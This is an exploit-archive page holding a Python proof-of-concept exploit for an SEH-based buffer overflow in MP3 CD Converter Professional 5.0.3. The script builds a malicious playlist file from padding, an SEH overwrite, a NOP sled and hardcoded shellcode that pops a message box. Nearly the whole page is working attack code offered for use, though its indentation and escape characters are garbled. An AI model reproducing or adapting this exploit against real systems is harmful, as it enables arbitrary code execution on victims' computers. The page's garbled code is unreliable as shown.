Home / os / win7

MP3 CD Converter Professional Buffer Overflow

Posted on 20 December 2010

#!/usr/bin/python
#
#
#Python File Created BY C4SS!0 G0MES
#http://www.invasao.com.br
#Louredo_@hotmail.com
#
#
#[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)
#[+]Date: 12/20/2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
#[+]Version: 5.0.3
#[+]Tested On: WIN-XP SP3 Virtual Box
#[+]CVE: N/A
#
#
#


import os
import sys
import struct
import time

def usage():
os.system("cls")
os.system("color 4f")
print("
"
"=====================================================================
"
"||                                                                 ||
"
"||      Exploit Buffer Overflow MP3 CD Converter Professional(SEH) ||
"
"||      Author C4SS!0 G0M3S                                        ||
||"
"                                                                 ||
"
"=====================================================================

")

print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)")
print("[+]Date: 12/20/2010")
print("[+]Author: C4SS!0 G0M3S")
print("[+]E-mail: Louredo_@hotmail.com")
print("[+]Home: http://www.invasao.com.br")
print("[+]Impact: Hich")
print("[+]Version: 5.0.3")
print("[+]Country: Brazil
")

if len(sys.argv) !=2:
usage()
print "[-]Usage: "+sys.argv[0]+" <File Name>"
print "[-]Exemple: "+sys.argv[0]+" Exploit.pls"
sys.exit(0)

buffer = "x41" * 780
nseh = "xebx0dx90x90"  #JMP SHORT 14
seh = struct.pack('<L',0x0077cebf)
nops = "x90" * 10
usage()
print "[*]Identifying the length Shellcode"
time.sleep(1)
shellcode = ("x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50"
"xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50"
"xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43"
"x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B"
"x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6")

print "[*]The length is Shellcode:"+str(len(shellcode))
time.sleep(1)



payload = str(buffer+nseh+seh+nops+shellcode)

print "[*]Creating the Archive "+sys.argv[1]
time.sleep(1)
file = sys.argv[1]
try:
f=open(file,"w")
f.write(payload)
f.close()
print "[*]The Archive was created "+str(file)+" Success"
time.sleep(1)
except:
print "[-]Error Creating File "+file

 

TOP

Malware :

Exploits :